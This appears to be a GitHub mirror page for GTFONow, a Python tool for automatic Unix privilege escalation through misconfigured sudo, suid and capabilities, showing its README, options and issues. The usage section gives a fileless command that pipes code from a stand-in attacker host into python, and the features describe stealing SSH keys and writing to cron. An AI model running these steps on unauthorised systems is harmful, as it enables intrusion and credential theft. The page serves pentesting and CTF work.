frissi0n / gtfonow Goto Github PK

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.

License: MIT License

Python 98.99% Dockerfile 1.01%

pentesting ctf suid-binaries privilege-escalation post-exploitation gtfobins hackthebox pentest redteam hacking security security-tools ctf-tools offensive-security

gtfonow's Introduction

GTFONow

Automatic privilege escalation on unix systems by exploiting misconfigured setuid/setgid binaries, capabilities and sudo permissions. Designed for CTFs but also applicable in real world pentests.

✅ Features

Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python

💻 Usage

To use GTFONow, simply run the script from your command line. The basic syntax is as follows:

python gtfonow.py [OPTIONS]

It can also be run by piping the output of curl:

curl http://attacker.host/gtfonow.py | python

Options

--level: Sets the level of checks to perform. You can choose between:
- 1 (default) for a quick scan.
- 2 for a more thorough scan.
- Example: python gtfonow.py --level 2
--risk: Specifies the risk level of the exploit to perform. The options are:
- 1 (default) for safe operations.
- 2 for more aggressive operations such as file modifications, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing.
- Example: python gtfonow.py --risk 2
--command: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes.
- Example: python gtfonow.py --command 'ls -la'
--auto: Automatically exploits without user wizard.
-v, --verbose: Enables verbose output.
- Example: python gtfonow.py --verbose

Compatibility

By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed.

Python2.*
Python3.*
No 3rd party dependencies
Any Unix Variant (Linux, MacOS,*Nix)
Any architecture eg (X86/ARM64/X86-64)

🙏 Credits

Payloads thanks to GTFOBins.

gtfonow's People

Contributors

Stargazers

Watchers

gtfonow's Issues

Interactionless mode

Currently GTFONow provides the user an interactive wizard for exploiting the host. If stdin is not available, or the user just wants to instantly pop a shell without choosing options, we should provide an interactionless mode.

Run Tests on Multiple Platforms

The (limited) tests are only ran on Debian, expand tests to other platforms.

Add Descriptions from GTFOBins

Add descriptions from GTFOBins to GTFONow to help user decide which exploit to use.

Upon finding exploitable ssh-agent it asks for "sudo password" and immediately crashes

Upon finding exploitable ssh-agent it asks for "sudo password" and immediately crashes. I tried running it with -a flags (same behavior) and with "--sudo_password", where it asks for the sudo password once, and once provided it prompts for it again and crashes.

Running on kali-linux over wsl2 for tests, but I could test on Arch linux (no wsl) too if needed.

❯ python gtfonow.py --sudo_password

/ / / / __ / |/ / _ __
/ ( / / / / // // / / _ \ |/|/ /
_/ // // _//|/_/,__/

https://github.com/Frissi0n/GTFONow

[!] Found exploitable sgid binary: /usr/bin/ssh-agent
Enter sudo password:

[sudo] password for tux: Command timed out. User may need to enter a password.
Traceback (most recent call last):
File "/home/tux/hack/GTFONow/gtfonow/gtfonow.py", line 4224, in
main()
File "/home/tux/hack/GTFONow/gtfonow/gtfonow.py", line 4200, in main
sudo_privescs, suid_privescs, cap_privescs = perform_privilege_escalation_checks(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/tux/hack/GTFONow/gtfonow/gtfonow.py", line 4100, in perform_privilege_escalation_checks
cap_privescs.extend(check_cap_bins())
^^^^^^^^^^^^^^^^
File "/home/tux/hack/GTFONow/gtfonow/gtfonow.py", line 3792, in check_cap_bins
if check_capability(binary_path, "cap_setuid"):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/tux/hack/GTFONow/gtfonow/gtfonow.py", line 3672, in check_capability
if capability in result:
^^^^^^^^^^^^^^^^^^^^
TypeError: a bytes-like object is required, not 'str'